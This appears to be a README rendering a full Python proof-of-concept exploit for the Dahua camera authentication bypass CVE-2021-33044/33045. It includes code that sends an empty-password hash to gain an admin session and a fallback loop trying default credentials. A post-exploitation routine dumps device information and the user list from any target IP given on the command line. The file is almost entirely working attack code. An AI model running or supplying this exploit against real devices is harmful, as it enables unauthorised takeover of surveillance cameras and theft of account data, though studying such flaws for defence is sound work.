README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Dahua Authentication Bypass PoC
CVE-2021-33044 & CVE-2021-33045
Real vulnerability (Source: NVD / Dahua Security Advisory DSA-2021-001):
"The identity authentication bypass vulnerability found in some Dahua products
during the login process. Attackers can bypass device identity authentication
by constructing malicious data packets."
CVSS: 9.8 CRITICAL | CWE-287 (Improper Authentication)
In CISA Known Exploited Vulnerabilities Catalog (added 2024-08-21)
Ref: https://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html
http://seclists.org/fulldisclosure/2021/Oct/13
CVE-2021-33044: Affects IPC-HUM7xxx, IPC-HX3xxx, IPC-HX5xxx, TPC-*, VTO-*, VTH-*
Firmware < 2.820.0000000.5.r.210705 (IPC) / 2.630.x (TPC)
CVE-2021-33045: Same IPC models PLUS NVR-1xxx/2xxx/4xxx/5xxx/6xx, XVR-4x*/5x*/7x*
Firmware < 4.001.x
Attack method: The RPC2 login challenge-response uses:
step1 = MD5("user:realm:PASSWORD") <- attacker leaves PASSWORD empty
step2 = MD5("step1:random:step1")
Vulnerable firmware incorrectly accepts step1 computed with an empty password,
granting full admin access without knowing the actual password.
"""
import requests
import hashlib
import json
import argparse
import sys
requests.packages.urllib3.disable_warnings()
# ---------------------------------------------------------------------------
# RPC2 helpers
# ---------------------------------------------------------------------------
def rpc2_get_challenge(target, port, timeout=8, http=None):
"""
Step 1 of login: send empty-password probe to get server realm + random nonce.
The camera always responds with these even before auth is verified.
"""
url = f"http://{target}:{port}/RPC2_Login"
payload = {
"method": "global.login",
"params": {
"userName": "admin",
"password": "",
"clientType": "Web3.0",
"loginType": "Direct",
"authorityType": "Default",
"passwordType": "Default"
},
"id": 1,
"session": 0
}
try:
r = (http or requests).post(url, json=payload, timeout=timeout, verify=False)
data = r.json()
realm = data.get("params", {}).get("realm", "")
random = data.get("params", {}).get("random", "")
return realm, random, data
except Exception as e:
return None, None, str(e)
def rpc2_bypass_hash(username, realm, random_str):
"""
CVE-2021-33044 / CVE-2021-33045 bypass.
A correct client computes:
step1 = MD5("{user}:{realm}:{PASSWORD}")
step2 = MD5("{step1}:{random}:{step1}")
The bypass: use an EMPTY password field in step1.
Vulnerable Dahua firmware does not distinguish between an empty-password
hash and a valid-credential hash, so it grants access.
"""
step1 = hashlib.md5(f"{username}:{realm}:".encode()).hexdigest().upper()
step2 = hashlib.md5(f"{step1}:{random_str}:{step1}".encode()).hexdigest().upper()
return step2
def rpc2_legit_hash(username, password, realm, random_str):
"""Correct hash used for default-cred testing on patched devices."""
step1 = hashlib.md5(f"{username}:{realm}:{password}".encode()).hexdigest().upper()
step2 = hashlib.md5(f"{step1}:{random_str}:{step1}".encode()).hexdigest().upper()
return step2
def rpc2_send_login(target, port, username, pw_hash, session=0, timeout=8, http=None):
"""Step 2: submit the hash and return the JSON response."""
url = f"http://{target}:{port}/RPC2_Login"
payload = {
"method": "global.login",
"params": {
"userName": username,
"password": pw_hash,
"clientType": "Web3.0",
"loginType": "Direct",
"authorityType": "Default",
"passwordType": "Default"
},
"id": 2,
"session": session
}
try:
r = (http or requests).post(url, json=payload, timeout=timeout, verify=False)
return r.json()
except Exception as e:
return {"error": str(e)}
# ---------------------------------------------------------------------------
# Core bypass
# ---------------------------------------------------------------------------
def exploit_auth_bypass(target, port=80, timeout=8):
"""
Full CVE-2021-33044 / CVE-2021-33045 auth bypass.
Returns (success, session_id, response).
"""
http = requests.Session()
http.verify = False
print(f"[*] Probing RPC2 challenge from {target}:{port} ...")
realm, random_str, raw1 = rpc2_get_challenge(target, port, timeout, http=http)
if not realm:
print(f"[-] Could not reach RPC2_Login: {raw1}")
return False, None, raw1
sess = raw1.get("session", 0) if isinstance(raw1, dict) else 0
print(f"[+] Challenge realm='{realm}' random='{random_str}' session={sess}")
bypass_hash = rpc2_bypass_hash("admin", realm, random_str)
print(f"[*] Sending bypass hash (empty-password): {bypass_hash}")
resp = rpc2_send_login(target, port, "admin", bypass_hash, sess, timeout, http=http)
if resp.get("result") is True:
session_id = resp.get("session", "")
print(f"\n[!!!] BYPASS SUCCESSFUL (CVE-2021-33044/33045)")
print(f"[!!!] Session ID : {session_id}")
return True, session_id, resp
else:
err = resp.get("error", {})
print(f"[-] Bypass rejected code={err.get('code')} msg={err.get('message')}")
print(f" Target may be patched or RPC2 is not on this port.")
return False, None, resp
def test_default_creds(target, port=80, timeout=8):
"""Fallback: try default passwords via the correct hash on a patched device."""
defaults = [
("admin", ""),
("admin", "admin"),
("admin", "888888"),
("admin", "666666"),
("admin", "123456"),
("666666", "666666"),
("888888", "888888"),
]
http = requests.Session()
http.verify = False
print("\n[*] Trying default credentials ...")
realm, random_str, raw = rpc2_get_challenge(target, port, timeout, http=http)
if not realm:
print("[-] RPC2 unreachable skipping")
return None
sess = raw.get("session", 0) if isinstance(raw, dict) else 0
for user, pw in defaults:
h = rpc2_legit_hash(user, pw, realm, random_str)
resp = rpc2_send_login(target, port, user, h, sess, timeout, http=http)
if resp.get("result") is True:
print(f"[+] Valid credentials: {user}:{pw!r}")
return (user, pw, resp.get("session"))
print("[-] No default credentials matched")
return None
# ---------------------------------------------------------------------------
# Post-exploitation
# ---------------------------------------------------------------------------
def rpc2_call(target, port, session_id, method, params=None, timeout=8):
"""Authenticated RPC2 call using a live session."""
url = f"http://{target}:{port}/RPC2"
try:
r = requests.post(url, json={
"method": method,
"params": params or {},
"session": session_id,
"id": 10
}, timeout=timeout, verify=False)
return r.json()
except Exception as e:
return {"error": str(e)}
def dump_info(target, port, session_id):
"""Pull device info and user list after a successful login."""
print("\n[*] Dumping device info ...")
for method in [
"magicBox.getDeviceType",
"magicBox.getSoftwareVersion",
"magicBox.getSystemInfo",
]:
resp = rpc2_call(target, port, session_id, method)
print(f" {method}: {resp}")
print("\n[*] Dumping user list ...")
resp = rpc2_call(target, port, session_id, "userManager.getUserInfoAll")
print(f" Users: {json.dumps(resp, indent=2)}")
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(
description="Dahua Auth Bypass PoC CVE-2021-33044 / CVE-2021-33045",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
python dahua_auth_bypass.py 192.168.1.100
python dahua_auth_bypass.py 192.168.1.100 -p 8080
python dahua_auth_bypass.py 192.168.1.100 --dump
"""
)
parser.add_argument("target", help="Camera IP or hostname")
parser.add_argument("-p", "--port", type=int, default=80, help="HTTP port (default: 80)")
parser.add_argument("--dump", action="store_true",
help="After bypass, dump device info and user list")
parser.add_argument("--timeout", type=int, default=8)
args = parser.parse_args()
print(f"""
Dahua Auth Bypass PoC
CVE-2021-33044 / CVE-2021-33045
CVSS 9.8 CRITICAL CWE-287
Target : {args.target}:{args.port}
""")
ok, session_id, _ = exploit_auth_bypass(args.target, args.port, args.timeout)
if not ok:
result = test_default_creds(args.target, args.port, args.timeout)
if result:
ok = True
session_id = result[2]
if ok and session_id and args.dump:
dump_info(args.target, args.port, session_id)
sys.exit(0 if ok else 1)
if __name__ == "__main__":
main()